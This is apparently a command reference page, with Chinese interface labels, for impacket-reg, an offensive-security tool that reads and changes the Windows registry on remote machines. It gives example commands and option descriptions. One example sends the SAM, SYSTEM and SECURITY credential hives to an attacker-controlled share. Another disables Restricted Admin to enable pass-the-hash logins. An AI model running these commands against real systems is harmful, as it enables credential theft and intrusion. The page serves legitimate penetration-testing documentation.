← 返回命令列表

Linux command

impacket-reg 命令

文件

复制后可按需替换文件名、目录或参数。

常用示例

Query a registry key

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion'

Recursively query

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SYSTEM\CurrentControlSet' -s

Query a specific value

impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -v ProductName

Add a registry value

impacket-reg '[domain]/[user]:[password]@[target]' add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0

Delete a registry value

impacket-reg '[domain]/[user]:[password]@[target]' delete -keyName 'HKLM\SOFTWARE\TestKey' -v TestValue

Backup SAM, SYSTEM, and SECURITY hives

impacket-reg '[domain]/[user]:[password]@[target]' backup -o '\\[attacker_ip]\[share]'

说明

impacket-reg provides remote Windows registry manipulation through the MS-RRP MSRPC interface, functioning as a remote equivalent to Windows reg.exe. It can query, add, delete, and save registry keys and values on remote Windows machines. The tool automatically starts the Remote Registry service on the target if it is not running (even if disabled), and restores the original state when finished. This makes it effective even against hardened hosts where the service has been manually disabled.

参数

-debug
Turn DEBUG output on.
-ts
Add timestamp to every logging output.
-hashes _LMHASH:NTHASH_
Use NTLM hashes for authentication.
-no-pass
Do not prompt for password.
-k
Use Kerberos authentication from ccache file (KRB5CCNAME).
-aesKey _KEY_
AES key for Kerberos authentication (128 or 256 bit).
-dc-ip _IP_
IP address of the domain controller.
-target-ip _IP_
IP address of the target machine.
-port _PORT_
Destination port (139 or 445, default 445).

FAQ

What is the impacket-reg command used for?

impacket-reg provides remote Windows registry manipulation through the MS-RRP MSRPC interface, functioning as a remote equivalent to Windows reg.exe. It can query, add, delete, and save registry keys and values on remote Windows machines. The tool automatically starts the Remote Registry service on the target if it is not running (even if disabled), and restores the original state when finished. This makes it effective even against hardened hosts where the service has been manually disabled.

How do I run a basic impacket-reg example?

Run `impacket-reg '[domain]/[user]:[password]@[target]' query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion'` in a terminal, then adjust file names, paths, flags, or remote targets for your system.

What does -debug do in impacket-reg?

Turn DEBUG output on.